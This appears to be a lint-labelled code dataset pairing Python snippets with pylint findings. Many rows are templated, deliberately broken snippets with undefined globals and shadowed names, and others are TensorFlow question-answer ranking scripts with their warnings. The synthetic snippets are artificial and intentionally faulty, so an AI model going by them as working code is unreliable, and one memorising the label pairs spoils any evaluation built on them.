Columns:
code — string, length 20 to 13.2k
label — string, length 21 to 6.26k
1 datetime = 1
2
3 def foo():
4     global v
5     print(BaseClass)
6     BaseClass = 10
7     print(BaseClass)
8     val()
9 print(datetime)
5 - error: global-variable-undefined
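This label repeats across the samples below: pylint's global-variable-undefined (W0601) fires because `global v` names a variable that is never assigned at module level. A minimal sketch of the fixed pattern, with illustrative names (not from any sample above):

v = 0  # assigning the global at module level satisfies W0601

def foo():
    global v
    print(v)
    v = 10  # rebinding a declared, module-level global is well-defined
    print(v)

foo()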
1 nearest_int = 1
2
3 def foo():
4     global v
5     print(fh)
6     fh = 10
7     print(fh)
8     v1()
9 print(nearest_int)
5 - error: global-variable-undefined
1 np = 1
2
3 def foo():
4     global v
5     print(NANOSECONDS)
6     NANOSECONDS = 10
7     print(NANOSECONDS)
8     np()
9 print(np)
5 - error: global-variable-undefined
1 skip = 1
2
3 def foo():
4     global v
5     print(start)
6     start = 10
7     print(start)
8     foo()
9 print(skip)
5 - error: global-variable-undefined
1 na_rm = 1
2
3 def foo():
4     global v
5     print(v1)
6     v1 = 10
7     print(v1)
8     breaks_()
9 print(na_rm)
5 - error: global-variable-undefined
1 nearest_int = 1
2
3 def foo():
4     global v
5     print(data)
6     data = 10
7     print(data)
8     i()
9 print(nearest_int)
5 - error: global-variable-undefined
1 MSG = 1
2
3 def foo():
4     global v
5     print(log_format)
6     log_format = 10
7     print(log_format)
8     cdists()
9 print(MSG)
5 - error: global-variable-undefined
1 cdists = 1
2
3 def foo():
4     global v
5     print(ABC)
6     ABC = 10
7     print(ABC)
8     v1_to_v2_map()
9 print(cdists)
5 - error: global-variable-undefined
1 types = 1
2
3 def foo():
4     global v
5     print(transform)
6     transform = 10
7     print(transform)
8     trans()
9 print(types)
5 - error: global-variable-undefined
1 nearest_int = 1
2
3 def foo():
4     global v
5     print(sys)
6     sys = 10
7     print(sys)
8     date_format()
9 print(nearest_int)
5 - error: global-variable-undefined
1 k = 1
2
3 def foo():
4     global v
5     print(reduce)
6     reduce = 10
7     print(reduce)
8     x()
9 print(k)
5 - error: global-variable-undefined
1 x = 1
2
3 def foo():
4     global v
5     print(d)
6     d = 10
7     print(d)
8     n()
9 print(x)
5 - error: global-variable-undefined
1 nomatch = 1
2
3 def foo():
4     global v
5     print(probability_trans)
6     probability_trans = 10
7     print(probability_trans)
8     log_breaks()
9 print(nomatch)
5 - error: global-variable-undefined
1 limits = 1
2
3 def foo():
4     global v
5     print(d)
6     d = 10
7     print(d)
8     sys()
9 print(limits)
5 - error: global-variable-undefined
1 pd = 1
2
3 def foo():
4     global v
5     print(v)
6     v = 10
7     print(v)
8     i()
9 print(pd)
5 - error: global-variable-undefined
1 c = 1
2
3 def foo():
4     global v
5     print(func)
6     func = 10
7     print(func)
8     dmin()
9 print(c)
5 - error: global-variable-undefined
1 self = 1
2
3 def foo():
4     global v
5     print(incomparables)
6     incomparables = 10
7     print(incomparables)
8     SECONDS()
9 print(self)
5 - error: global-variable-undefined
1 item = 1
2
3 def foo():
4     global v
5     print(Iterator)
6     Iterator = 10
7     print(Iterator)
8     OrderedDict()
9 print(item)
5 - error: global-variable-undefined
1 log2_trans = 1
2
3 def foo():
4     global v
5     print(DISCRETE_KINDS)
6     DISCRETE_KINDS = 10
7     print(DISCRETE_KINDS)
8     Iterator()
9 print(log2_trans)
5 - error: global-variable-undefined
1 num2date = 1
2
3 def foo():
4     global v
5     print(np)
6     np = 10
7     print(np)
8     name()
9 print(num2date)
5 - error: global-variable-undefined
1 doc = 1
2
3 def foo():
4     global v
5     print(cdists)
6     cdists = 10
7     print(cdists)
8     aesthetic()
9 print(doc)
5 - error: global-variable-undefined
1 BaseClass = 1
2
3 def foo():
4     global v
5     print(n)
6     n = 10
7     print(n)
8     msg()
9 print(BaseClass)
5 - error: global-variable-undefined
1 log10_trans = 1
2
3 def foo():
4     global v
5     print(trans)
6     trans = 10
7     print(trans)
8     a()
9 print(log10_trans)
5 - error: global-variable-undefined
1 probability_trans = 1
2
3 def foo():
4     global v
5     print(probability_trans)
6     probability_trans = 10
7     print(probability_trans)
8     BaseClass()
9 print(probability_trans)
5 - error: global-variable-undefined
1 lru_cache = 1
2
3 def foo():
4     global v
5     print(ABC)
6     ABC = 10
7     print(ABC)
8     doc()
9 print(lru_cache)
5 - error: global-variable-undefined
1 ABC = 1
2
3 def foo():
4     global v
5     print(tz)
6     tz = 10
7     print(tz)
8     ABC()
9 print(ABC)
5 - error: global-variable-undefined
1 MethodType = 1
2
3 def foo():
4     global v
5     print(klass_name)
6     klass_name = 10
7     print(klass_name)
8     vmax()
9 print(MethodType)
5 - error: global-variable-undefined
1 log10_trans = 1
2
3 def foo():
4     global v
5     print(name)
6     name = 10
7     print(name)
8     NANOSECONDS()
9 print(log10_trans)
5 - error: global-variable-undefined
1 name = 1
2
3 def foo():
4     global v
5     print(aesthetic)
6     aesthetic = 10
7     print(aesthetic)
8     current_date()
9 print(name)
5 - error: global-variable-undefined
1 import datetime
2
3 current_date: str = datetime.date.today().strftime("%y-%m-%d")
4 DISCRETE_KINDS = 1
5
6 def foo():
7     global v
8     print(pd)
9     pd = 10
10     print(pd)
11     num2date()
12 print(DISCRETE_KINDS)
13 import datetime
14 na_rm: str = i.date.today().strftime('%y-%m-%d')
8 - error: global-variable-undefined
1 import datetime
2 na_rm: str = i.date.today().strftime('%y-%m-%d')
3 dataspace_is_numerical = 1
4
5 def foo():
6     global v
7     print(v1)
8     v1 = 10
9     print(v1)
10     obj()
11 print(dataspace_is_numerical)
12 import datetime
13 incomparables: str = skip.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 incomparables: str = skip.date.today().strftime('%y-%m-%d')
3 v1_to_v2_map = 1
4
5 def foo():
6     global v
7     print(bar)
8     bar = 10
9     print(bar)
10     y()
11 print(v1_to_v2_map)
12 import datetime
13 attr: str = minor_breaks.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 attr: str = minor_breaks.date.today().strftime('%y-%m-%d')
3 incomparables = 1
4
5 def foo():
6     global v
7     print(func)
8     func = 10
9     print(func)
10     n()
11 print(incomparables)
12 import datetime
13 inverse: str = OrderedDict.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 inverse: str = OrderedDict.date.today().strftime('%y-%m-%d')
3 minor_breaks = 1
4
5 def foo():
6     global v
7     print(timedelta_format)
8     timedelta_format = 10
9     print(timedelta_format)
10     mpl_format()
11 print(minor_breaks)
12 import datetime
13 obj: str = d.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 obj: str = d.date.today().strftime('%y-%m-%d')
3 NANOSECONDS = 1
4
5 def foo():
6     global v
7     print(_x)
8     _x = 10
9     print(_x)
10     name()
11 print(NANOSECONDS)
12 import datetime
13 probability_trans: str = obj.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 probability_trans: str = obj.date.today().strftime('%y-%m-%d')
3 f = 1
4
5 def foo():
6     global v
7     print(value)
8     value = 10
9     print(value)
10     datetime()
11 print(f)
12 import datetime
13 v2: str = args.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 v2: str = args.date.today().strftime('%y-%m-%d')
3 contents = 1
4
5 def foo():
6     global v
7     print(item)
8     item = 10
9     print(item)
10     t()
11 print(contents)
12 import datetime
13 log10_trans: str = incomparables.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 log10_trans: str = incomparables.date.today().strftime('%y-%m-%d')
3 doc = 1
4
5 def foo():
6     global v
7     print(nearest_int)
8     nearest_int = 10
9     print(nearest_int)
10     i()
11 print(doc)
12 import datetime
13 na_rm: str = doc.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 na_rm: str = doc.date.today().strftime('%y-%m-%d')
3 _get = 1
4
5 def foo():
6     global v
7     print(t)
8     t = 10
9     print(t)
10     ABC()
11 print(_get)
12 import datetime
13 v1: str = log_format.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 v1: str = log_format.date.today().strftime('%y-%m-%d')
3 accuracy = 1
4
5 def foo():
6     global v
7     print(i)
8     i = 10
9     print(i)
10     breaks_()
11 print(accuracy)
12 import datetime
13 v2: str = c.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 v2: str = c.date.today().strftime('%y-%m-%d')
3 MethodType = 1
4
5 def foo():
6     global v
7     print(self)
8     self = 10
9     print(self)
10     nearest_int()
11 print(MethodType)
12 import datetime
13 func: str = v1.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 func: str = v1.date.today().strftime('%y-%m-%d')
3 v1_to_v2_map = 1
4
5 def foo():
6     global v
7     print(na_rm)
8     na_rm = 10
9     print(na_rm)
10     x()
11 print(v1_to_v2_map)
12 import datetime
13 v: str = contents.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 v: str = contents.date.today().strftime('%y-%m-%d')
3 trans = 1
4
5 def foo():
6     global v
7     print(log_trans)
8     log_trans = 10
9     print(log_trans)
10     probit_trans()
11 print(trans)
12 import datetime
13 c: str = transform.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime
2 c: str = transform.date.today().strftime('%y-%m-%d')
3 y = 1
4
5 def foo():
6     global v
7     print(log_format)
8     log_format = 10
9     print(log_format)
10     v2()
11 print(y)
12 import datetime
13 reduce: str = BaseClass.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1
2 import data_helper
3 import time
4 import datetime
5 import os
6 import tensorflow as tf
7
8 import numpy as np
9 import evaluation
10 now = int(time.time())
11
12 timeArray = time.localtime(now)
13 timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
14 timeDay = time.strftime("%Y%m%d", timeArray)
15 print (timeStamp)
16
17 def main(args):
18     args._parse_flags()
19     print("\nParameters:")
20     for attr, value in sorted(args.__flags.items()):
21         print(("{}={}".format(attr.upper(), value)))
22     log_dir = 'log/'+ timeDay
23     if not os.path.exists(log_dir):
24         os.makedirs(log_dir)
25     data_file = log_dir + '/test_' + args.data + timeStamp
26     precision = data_file + 'precise'
27     print('load data ...........')
28     train,test,dev = data_helper.load(args.data,filter = args.clean)
29
30     q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
31     a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
32
33     alphabet = data_helper.get_alphabet([train,test,dev])
34     print('the number of words',len(alphabet))
35
36     print('get embedding')
37     if args.data=="quora":
38         embedding = data_helper.get_embedding(alphabet,language="cn")
39     else:
40         embedding = data_helper.get_embedding(alphabet)
41
42
43
44     with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
45         # with tf.device("/cpu:0"):
46         session_conf = tf.ConfigProto()
47         session_conf.allow_soft_placement = args.allow_soft_placement
48         session_conf.log_device_placement = args.log_device_placement
49         session_conf.gpu_options.allow_growth = True
50         sess = tf.Session(config=session_conf)
51
52         model = QA_CNN_extend(max_input_left = q_max_sent_length,
53             max_input_right = a_max_sent_length,
54             batch_size = args.batch_size,
55             vocab_size = len(alphabet),
56             embedding_size = args.embedding_dim,
57             filter_sizes = list(map(int, args.filter_sizes.split(","))),
58             num_filters = args.num_filters,
59             hidden_size = args.hidden_size,
60             dropout_keep_prob = args.dropout_keep_prob,
61             embeddings = embedding,
62             l2_reg_lambda = args.l2_reg_lambda,
63             trainable = args.trainable,
64             pooling = args.pooling,
65             conv = args.conv)
66
67         model.build_graph()
68
69         sess.run(tf.global_variables_initializer())
70         def train_step(model,sess,batch):
71             for data in batch:
72                 feed_dict = {
73                     model.question:data[0],
74                     model.answer:data[1],
75                     model.answer_negative:data[2],
76                     model.q_mask:data[3],
77                     model.a_mask:data[4],
78                     model.a_neg_mask:data[5]
79
80                 }
81                 _, summary, step, loss, accuracy,score12, score13, see = sess.run(
82                     [model.train_op, model.merged,model.global_step,model.loss, model.accuracy,model.score12,model.score13, model.see],
83                     feed_dict)
84                 time_str = datetime.datetime.now().isoformat()
85                 print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
86         def predict(model,sess,batch,test):
87             scores = []
88             for data in batch:
89                 feed_dict = {
90                     model.question:data[0],
91                     model.answer:data[1],
92                     model.q_mask:data[2],
93                     model.a_mask:data[3]
94
95                 }
96                 score = sess.run(
97                     model.score12,
98                     feed_dict)
99                 scores.extend(score)
100
101             return np.array(scores[:len(test)])
102
103
104
105
106
107         for i in range(args.num_epoches):
108             datas = data_helper.get_mini_batch(train,alphabet,args.batch_size)
109             train_step(model,sess,datas)
110             test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
111
112             predicted_test = predict(model,sess,test_datas,test)
113             print(len(predicted_test))
114             print(len(test))
115             map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
116
117             print('map_mrr test',map_mrr_test)
118
119
120
121
122
123
124
125
126
17 - refactor: too-many-locals
18 - warning: protected-access
20 - warning: protected-access
30 - warning: unnecessary-lambda
31 - warning: unnecessary-lambda
52 - error: undefined-variable
81 - warning: unused-variable
81 - warning: unused-variable
26 - warning: unused-variable
107 - warning: unused-variable
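The one hard error here is `52 - error: undefined-variable`: `QA_CNN_extend` is constructed without ever being imported. A later sample in this section imports the same class via `from .QA_CNN_pairwise import QA_CNN_extend`, so a plausible fix (the `models` package name is an assumption) would be:

from models.QA_CNN_pairwise import QA_CNN_extend  # assumed package layout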
1 class Singleton(object):
2     __instance=None
3     def __init__(self):
4         pass
5     def getInstance(self):
6         if Singleton.__instance is None:
7             # Singleton.__instance=object.__new__(cls,*args,**kwd)
8             Singleton.__instance=self.get_test_flag()
9             print("build FLAGS over")
10         return Singleton.__instance
11     def get_test_flag(self):
12         import tensorflow as tf
13         flags = tf.app.flags
14         if len(flags.FLAGS.__dict__.keys())<=2:
15
16             flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
17             flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
18             flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
19             flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
20             flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
21             flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
22             flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
23             flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
24             flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
25             flags.DEFINE_integer("hidden_size",100,"the default hidden size")
26             flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
27
28             # Training parameters
29             flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
30             flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
31             flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
32             flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
33             flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
34
35             flags.DEFINE_string('data','wiki','data set')
36             flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
37             flags.DEFINE_boolean('clean',True,'whether we clean the data')
38             flags.DEFINE_string('conv','wide','wide conv or narrow')
39             flags.DEFINE_integer('gpu',0,'gpu number')
40             # Misc Parameters
41             flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
42             flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
43         return flags.FLAGS
44     def get_rnn_flag(self):
45         import tensorflow as tf
46         flags = tf.app.flags
47         if len(flags.FLAGS.__dict__.keys())<=2:
48
49             flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
50             flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
51             flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
52             flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
53             flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
54             flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
55             flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
56             flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
57             flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
58             flags.DEFINE_integer("hidden_size",100,"the default hidden size")
59             flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
60
61             # Training parameters
62             flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
63             flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
64             flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
65             flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
66             flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
67
68
69             # flags.DEFINE_string('data','8008','data set')
70
71             flags.DEFINE_string('data','trec','data set')
72
73             flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
74             flags.DEFINE_boolean('clean',False,'whether we clean the data')
75             flags.DEFINE_string('conv','wide','wide conv or narrow')
76             flags.DEFINE_integer('gpu',0,'gpu number')
77             # Misc Parameters
78             flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
79             flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
80         return flags.FLAGS
81     def get_cnn_flag(self):
82         import tensorflow as tf
83         flags = tf.app.flags
84         if len(flags.FLAGS.__dict__.keys())<=2:
85
86             flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
87             flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
88             flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
89             flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
90             flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
91             flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
92             flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
93             flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
94             flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
95             flags.DEFINE_integer("hidden_size",100,"the default hidden size")
96             flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
97
98             # Training parameters
99             flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
100             flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
101             flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
102             flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
103             flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
104
105             flags.DEFINE_string('data','wiki','data set')
106             flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
107             flags.DEFINE_boolean('clean',True,'whether we clean the data')
108             flags.DEFINE_string('conv','wide','wide conv or narrow')
109             flags.DEFINE_integer('gpu',0,'gpu number')
110             # Misc Parameters
111             flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
112             flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
113         return flags.FLAGS
114
115
116     def get_qcnn_flag(self):
117
118         import tensorflow as tf
119         flags = tf.app.flags
120         if len(flags.FLAGS.__dict__.keys())<=2:
121
122
123             flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
124             flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
125             flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
126             flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
127             flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
128             flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
129
130             flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
131             flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
132             flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
133             flags.DEFINE_integer("hidden_size",100,"the default hidden size")
134
135             flags.DEFINE_string("model_name", "qcnn", "cnn or rnn")
136
137
138             # Training parameters
139             flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
140             flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
141             flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
142             flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
143             flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
144
145
146             flags.DEFINE_string('data','wiki','data set')
147             flags.DEFINE_string('pooling','mean','max pooling or attentive pooling')
148
149             flags.DEFINE_boolean('clean',True,'whether we clean the data')
150             flags.DEFINE_string('conv','wide','wide conv or narrow')
151             flags.DEFINE_integer('gpu',0,'gpu number')
152             # Misc Parameters
153             flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
154             flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
155         return flags.FLAGS
156
157     def get_8008_flag(self):
158         import tensorflow as tf
159         flags = tf.app.flags
160         if len(flags.FLAGS.__dict__.keys())<=2:
161
162             flags.DEFINE_integer("embedding_size",200, "Dimensionality of character embedding (default: 128)")
163             flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
164             flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
165             flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
166             flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
167             flags.DEFINE_float("learning_rate", 1e-3, "learn rate( default: 0.0)")
168             flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
169             flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
170             flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
171             flags.DEFINE_integer("hidden_size",100,"the default hidden size")
172             flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
173
174             # Training parameters
175             flags.DEFINE_integer("batch_size", 250, "Batch Size (default: 64)")
176             flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
177             flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
178             flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
179             flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
180
181             flags.DEFINE_string('data','8008','data set')
182             flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
183             flags.DEFINE_boolean('clean',False,'whether we clean the data')
184             flags.DEFINE_string('conv','wide','wide conv or narrow')
185             flags.DEFINE_integer('gpu',0,'gpu number')
186             # Misc Parameters
187             flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
188             flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
189         return flags.FLAGS
190
191
192
193
194 if __name__=="__main__":
195     args=Singleton().get_test_flag()
196     for attr, value in sorted(args.__flags.items()):
197         print(("{}={}".format(attr.upper(), value)))
198
1 - refactor: useless-object-inheritance
196 - warning: protected-access
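A hedged sketch for the two findings above, assuming Python 3 and absl-backed TF flags: dropping the explicit `object` base fixes useless-object-inheritance, and absl's public `flag_values_dict()` accessor replaces the protected `__flags` attribute.

class Singleton:                      # no explicit object base on Python 3
    _instance = None

def print_flags(flags_obj):
    # flag_values_dict() is absl's public accessor; using it instead of
    # flags_obj.__flags removes the protected-access warning.
    for attr, value in sorted(flags_obj.flag_values_dict().items()):
        print("{}={}".format(attr.upper(), value))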
1 # -*- coding: utf-8 -*-
2
3 from tensorflow import flags
4 import tensorflow as tf
5 from config import Singleton
6 import data_helper
7
8 import datetime
9 import os
10 import models
11 import numpy as np
12 import evaluation
13
14 from data_helper import log_time_delta,getLogger
15
16 logger=getLogger()
17
18
19
20 args = Singleton().get_rnn_flag()
21 #args = Singleton().get_8008_flag()
22
23 args._parse_flags()
24 opts=dict()
25 logger.info("\nParameters:")
26 for attr, value in sorted(args.__flags.items()):
27     logger.info(("{}={}".format(attr.upper(), value)))
28     opts[attr]=value
29
30
31 train,test,dev = data_helper.load(args.data,filter = args.clean)
32
33 q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
34 a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
35
36 alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
37 logger.info('the number of words :%d '%len(alphabet))
38
39 if args.data=="quora" or args.data=="8008" :
40     print("cn embedding")
41     embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
42     train_data_loader = data_helper.getBatch48008
43 else:
44     embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
45     train_data_loader = data_helper.get_mini_batch
46 opts["embeddings"] =embedding
47 opts["vocab_size"]=len(alphabet)
48 opts["max_input_right"]=a_max_sent_length
49 opts["max_input_left"]=q_max_sent_length
50 opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
51
52 print("innitilize over")
53
54
55
56
57 #with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
58 with tf.Graph().as_default():
59     # with tf.device("/cpu:0"):
60     session_conf = tf.ConfigProto()
61     session_conf.allow_soft_placement = args.allow_soft_placement
62     session_conf.log_device_placement = args.log_device_placement
63     session_conf.gpu_options.allow_growth = True
64     sess = tf.Session(config=session_conf)
65     model=models.setup(opts)
66     model.build_graph()
67     saver = tf.train.Saver()
68     sess.run(tf.global_variables_initializer())  # run first, then print or save
69
70
71     ckpt = tf.train.get_checkpoint_state("checkpoint")
72     if ckpt and ckpt.model_checkpoint_path:
73         # Restores from checkpoint
74         saver.restore(sess, ckpt.model_checkpoint_path)
75     print(sess.run(model.position_embedding)[0])
76     if os.path.exists("model") :
77         import shutil
78         shutil.rmtree("model")
79     builder = tf.saved_model.builder.SavedModelBuilder("./model")
80     builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
81     builder.save(True)
82     variable_averages = tf.train.ExponentialMovingAverage( model)
83     variables_to_restore = variable_averages.variables_to_restore()
84     saver = tf.train.Saver(variables_to_restore)
85     for name in variables_to_restore:
86         print(name)
87
88     @log_time_delta
89     def predict(model,sess,batch,test):
90         scores = []
91         for data in batch:
92             score = model.predict(sess,data)
93             scores.extend(score)
94         return np.array(scores[:len(test)])
95
96
97     text = "怎么 提取 公积金 ?"  # Chinese test query: "How do I withdraw my housing fund?"
98
99     splited_text=data_helper.encode_to_split(text,alphabet)
100
101     mb_q,mb_q_mask = data_helper.prepare_data([splited_text])
102     mb_a,mb_a_mask = data_helper.prepare_data([splited_text])
103
104     data = (mb_q,mb_a,mb_q_mask,mb_a_mask)
105     score = model.predict(sess,data)
106     print(score)
107     feed_dict = {
108         model.question:data[0],
109         model.answer:data[1],
110         model.q_mask:data[2],
111         model.a_mask:data[3],
112         model.dropout_keep_prob_holder:1.0
113     }
114     sess.run(model.position_embedding,feed_dict=feed_dict)[0]
115
116
117
23 - warning: protected-access
24 - refactor: use-dict-literal
26 - warning: protected-access
33 - warning: unnecessary-lambda
34 - warning: unnecessary-lambda
39 - refactor: consider-using-in
89 - warning: redefined-outer-name
89 - warning: redefined-outer-name
89 - warning: redefined-outer-name
91 - warning: redefined-outer-name
92 - warning: redefined-outer-name
114 - warning: expression-not-assigned
3 - warning: unused-import
8 - warning: unused-import
12 - warning: unused-import
1 from .QA_CNN_pairwise import QA_CNN_extend as CNN
2 from .QA_RNN_pairwise import QA_RNN_extend as RNN
3 from .QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN
4 def setup(opt):
5   if opt["model_name"]=="cnn":
6     model=CNN(opt)
7   elif opt["model_name"]=="rnn":
8     model=RNN(opt)
9   elif opt['model_name']=='qcnn':
10     model=QCNN(opt)
11   else:
12     print("no model")
13     exit(0)
14   return model
5 - warning: bad-indentation
6 - warning: bad-indentation
7 - warning: bad-indentation
8 - warning: bad-indentation
9 - warning: bad-indentation
10 - warning: bad-indentation
11 - warning: bad-indentation
12 - warning: bad-indentation
13 - warning: bad-indentation
14 - warning: bad-indentation
1 - error: relative-beyond-top-level
2 - error: relative-beyond-top-level
3 - error: relative-beyond-top-level
13 - refactor: consider-using-sys-exit
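A hedged rewrite of the dispatcher above: absolute imports (the `models` package name is an assumption) avoid relative-beyond-top-level when the file is run outside its package, and `sys.exit` replaces the `exit()` builtin.

import sys

from models.QA_CNN_pairwise import QA_CNN_extend as CNN          # assumed package name
from models.QA_RNN_pairwise import QA_RNN_extend as RNN
from models.QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN

def setup(opt):
    # early returns make the chain flat; sys.exit fixes consider-using-sys-exit
    if opt["model_name"] == "cnn":
        return CNN(opt)
    if opt["model_name"] == "rnn":
        return RNN(opt)
    if opt["model_name"] == "qcnn":
        return QCNN(opt)
    print("no model")
    sys.exit(0)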
1 from my.general import flatten, reconstruct, add_wd, exp_mask
2
3 import numpy as np
4 import tensorflow as tf
5
6 _BIAS_VARIABLE_NAME = "bias"
7 _WEIGHTS_VARIABLE_NAME = "kernel"
8
9
10
